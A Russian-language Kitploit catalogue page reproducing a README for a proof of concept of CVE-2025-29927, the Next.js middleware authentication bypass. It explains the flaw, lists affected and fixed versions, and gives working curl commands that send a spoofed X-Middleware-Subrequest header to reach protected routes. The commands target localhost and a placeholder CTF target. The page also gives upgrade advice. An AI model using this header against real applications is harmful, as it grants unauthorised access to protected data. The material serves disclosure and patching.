Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-29927 — Эксплойт-концепт для CVE-2025-29927, демонстрирующий обход аутентификации в промежуточном ПО Next.js через заголовок x-middleware-subrequest, с затронутыми версиями и рекомендациями по смягчению. | Kitploit
Инструменты/GitHubGitHub/toddkk02/cve-2025-29927
Аутентификация и авторизацияАнализ уязвимостейОбход IDS/IPSЭксплуатация веб-приложенийCTFТестирование на Проникновение
GitHubtoddkk02/cve-2025-29927

CVE-2025-29927

Эксплойт-концепт для CVE-2025-29927, демонстрирующий обход аутентификации в промежуточном ПО Next.js через заголовок x-middleware-subrequest, с затронутыми версиями и рекомендациями по смягчению.

Репозиторий
25 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-29927 — Next.js Middleware Authentication Bypass

Обзор

Представьте вышибалу перед клубом: если вы скажете ему «я уже внутри», он пропустит вас без проверки. Именно это и представляет собой CVE-2025-29927.

Middleware в Next.js выполняется до обработки запроса, что делает его идеальным местом для обработки аутентификации. Next.js использует внутренний заголовок x-middleware-subrequest для предотвращения рекурсивных запросов и избежания бесконечных циклов. Эта уязвимость демонстрирует, что можно обойти или полностью пропустить выполнение middleware — включая критические проверки безопасности, такие как аутентификация, прежде чем запрос достигнет защищённого маршрута.


Затронутые версии

BranchFixed in
15.x< 15.2.3
14.x< 14.2.25
13.x< 13.5.9

Уязвимые приложения

  • Приложения, размещающие Next.js и использующие middleware
  • Приложения, полагающиеся на middleware для аутентификации и проверок безопасности, не выполняющие дополнительные проверки ниже по стеку приложения

Не затронуты

  • Приложения, размещённые на Vercel
  • Приложения, размещённые на Netlify
  • Приложения, опубликованные как статические экспорты (middleware не выполняется)

Воздействие

Тысячи или миллионы приложений работают на необновлённых версиях Next.js. Если не устранить уязвимость, она позволяет любому получить неаутентифицированный доступ к защищённым маршрутам — без каких-либо учётных данных.


Подтверждение концепции

root@kitploit:~
curl -H "X-Middleware-Subrequest: middleware:middleware:middleware:middleware:middleware" \
  http://localhost:3000/private-area

Ответ возвращает защищённую страницу без какой-либо аутентификации.

Я эксплуатировал эту уязвимость в реальной CTF-среде

root@kitploit:~
curl -s "http://<target>/<private-area>" \
  -H "X-Middleware-Subrequest: middleware:middleware:middleware:middleware:middleware"

Исправление

Обновите Next.js до исправленной версии:

  • 15.x → 15.2.3 или новее
  • 14.x → 14.2.25 или новее
  • 13.x → 13.5.9 или новее
Скачать инструмент